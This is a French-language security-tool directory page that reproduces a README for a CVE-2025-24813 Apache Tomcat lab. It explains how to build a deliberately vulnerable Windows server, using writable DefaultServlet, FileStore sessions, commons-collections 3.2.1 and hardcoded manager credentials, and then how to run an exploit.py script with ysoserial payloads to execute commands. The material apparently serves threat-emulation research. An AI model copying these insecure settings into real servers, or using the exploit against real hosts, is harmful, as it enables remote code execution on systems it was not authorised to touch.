Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-24813 — Instructions pour le déploiement rapide de Tomcat v9.0.90 avec java 25.0.1 2025-10-21 LTS sur Windows Server 2019 Standard pour les chercheurs paresseux. | Kitploit
Outils/GitHubGitHub/seahcy/cve-2025-24813
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubseahcy/cve-2025-24813

CVE-2025-24813

Instructions pour le déploiement rapide de Tomcat v9.0.90 avec java 25.0.1 2025-10-21 LTS sur Windows Server 2019 Standard pour les chercheurs paresseux.

Voir le dépôt
1il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-24813

Description

Ce repo vise à fournir des instructions claires pour le déploiement rapide de Tomcat v9.0.90 avec java 25.0.1 2025-10-21 LTS sur Windows Server 2019 Standard pour un exercice d'émulation de menaces de cybersécurité. Le exploit.py utilise ysoserial-all.jar pour créer une charge utile via le module CommonsCollections6 de ysoserial-all.jar, qui est ensuite désérialisée par la dépendance commons-collections-3.2.1.jar dans %CATALINA_HOME%\webapps\ROOT\WEB-INF\lib.

Configuration du terminal Windows Server 2019 Standard de la victime

  • Télécharger Tomcat v9.0.90 :
root@kitploit:~
Invoke-WebRequest -Uri "https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.90/bin/apache-tomcat-9.0.90-windows-x64.zip" -OutFile "apache-tomcat-9.0.90-windows-x64.zip"
Expand-Archive -Path "apache-tomcat-9.0.90-windows-x64.zip" -DestinationPath "C:\"
  • Télécharger java 25.0.1 2025-10-21 LTS (version ZIP) :
root@kitploit:~
Invoke-WebRequest -Uri "https://download.oracle.com/java/25/archive/jdk-25_windows-x64_bin.zip" -OutFile "jdk-25_windows-x64_bin.zip"
Expand-Archive -Path "jdk-25_windows-x64_bin.zip" -DestinationPath "C:\"
  • Télécharger la dépendance commons-collections :
root@kitploit:~
mkdir C:\apache-tomcat-9.0.90\webapps\ROOT\WEB-INF\lib\
cd C:\apache-tomcat-9.0.90\webapps\ROOT\WEB-INF\lib\
Invoke-WebRequest -Uri "https://repo1.maven.org/maven2/commons-collections/commons-collections/3.2.1/commons-collections-3.2.1.jar" -OutFile "commons-collections-3.2.1.jar"
  • Configuration des variables d'environnement
root@kitploit:~
1. Cliquez sur Démarrer
2. Tapez "modifier les variables d'environnement système"
3. Créez deux nouvelles variables système nommées
    - `%JAVA_HOME%` avec la valeur `C:\jdk-25.0.1`
    - `%CATALINA_HOME%` avec la valeur `C:\apache-tomcat-9.0.90`
4. Modifiez la variable système nommée `Path`, et ajoutez les valeurs suivantes :
   - `%JAVA_HOME%\bin`
   - `%CATALINA_HOME%\bin`
  • Création d’un service pour un démarrage automatique
root@kitploit:~
C:\apache-tomcat-9.0.90\bin\service.bat install Tomcat9Server
Set-Service -Name "Tomcat9Server" -StartupType Automatic
Start-Service -Name "Tomcat9Server"
  • Ouvrez tomcat-users.xml dans le dossier tomcat-9.0.90\conf et ajoutez ce qui suit AVANT </tomcat-users> :
root@kitploit:~
<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>
<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>
  • Ouvrez context.xml dans le dossier tomcat-9.0.90\conf et remplacez TOUT le contenu par ce qui suit :
root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<!-- The contents of this file will be loaded for each web application -->
<Context>

    <Manager className="org.apache.catalina.session.PersistentManager" maxIdleBackup="1" saveOnRestart="true" processExpiresFrequency="1">
        <Store className="org.apache.catalina.session.FileStore"/>
    </Manager>
</Context>
  • Ouvrez web.xml dans le dossier tomcat-9.0.90\conf, cherchez DefaultServlet et remplacez l'intégralité du bloc <servlet></servlet> par ce qui suit :
root@kitploit:~
<servlet>
        <servlet-name>default</servlet-name>
        <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
        <init-param>
            <param-name>debug</param-name>
            <param-value>0</param-value>
        </init-param>
        <init-param>
            <param-name>listings</param-name>
            <param-value>false</param-value>
        </init-param>
        <init-param>
          <param-name>readonly</param-name>
          <param-value>false</param-value>
        </init-param>
        <load-on-startup>1</load-on-startup>
    </servlet>
  • Redémarrez votre serveur avec PowerShell
root@kitploit:~
shutdown.bat
startup.bat
  • Si vous ne pouvez pas vous connecter au serveur web depuis l'extérieur, il est possible que le pare-feu Windows le bloque. Configurez votre pare-feu pour autoriser la connexion.
root@kitploit:~
New-NetFirewallRule -DisplayName "Tomcat9Server" -Direction Inbound -Protocol TCP -LocalPort 8080 -Action Allow
  • Félicitations ! Vous venez d'activer un serveur Tomcat vulnérable avec des capacités de désérialisation Java via commons-collections-3.2.1.jar, une persistance de session via FileStore, et une protection en lecture désactivée dans DefaultServlet (web.xml), ce qui le rend sensible à l'exploitation de CVE-2025-24813 via les charges utiles ysoserial. Ajoutez un index.html crédible dans C:\tomcat-9.0.90\webapps\ROOT pour un rendu plus soigné.

Configuration de SSL pour HTTPS (Optionnel)

  • Ouvrez C:\apache-tomcat-9.0.90\conf\web.xml avec le Bloc-notes, et cherchez "<Connector port=". Vous pouvez décommenter le bloc et ajouter votre propre chemin .pfx. Ci-dessous un exemple d'ajout d'un cert.pfx dans un dossier ssl nouvellement créé, sans mot de passe, fonctionnant en HTTP/1.1 :
root@kitploit:~
<Connector port="443" 
           protocol="org.apache.coyote.http11.Http11NioProtocol"
           maxThreads="150" 
           SSLEnabled="true"
           scheme="https" 
           secure="true">
    <SSLHostConfig>
        <Certificate certificateKeystoreFile="C:\tomcat-9.0.90\conf\ssl\cert.pfx"
                     certificateKeystorePassword=""
                     certificateKeystoreType="PKCS12" />
    </SSLHostConfig>
</Connector>
  • Ajoutez une règle de pare-feu si nécessaire :
root@kitploit:~
New-NetFirewallRule -DisplayName "Tomcat9HTTPSServer" -Direction Inbound -Protocol TCP -LocalPort 443 -Action Allow

Configuration de votre Kali

  • Cloner exploit.py
root@kitploit:~
git clone <this-repo-url>
cd CVE-2025-24813
pip install requests 
  • Vérifier si vous avez Java, et télécharger ysoserial depuis Github
root@kitploit:~
java --version
curl -L -o ysoserial-all.jar https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar
  • Exemples d'utilisation :
root@kitploit:~
python exploit.py -t http://<IP cible>:8080/ -c "cmd.exe /c calc.exe"

Résultat attendu et artefacts

  • À chaque exécution de exploit.py, deux fichiers de session seront créés dans C:\tomcat-9.0.90\webapps\ROOT et C:\tomcat-9.0.90\work\Catalina\localhost\ROOT avec un nom aléatoire. Le fichier .session dans le dossier work devrait être supprimé quelques secondes après l'exécution.

Références

  • https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-03-14-Testing-CVE-2025-24813.md
  • https://scrapco.de/blog/analysis-of-cve-2025-24813-apache-tomcat-path-equivalence-rce.html
Télécharger l’outil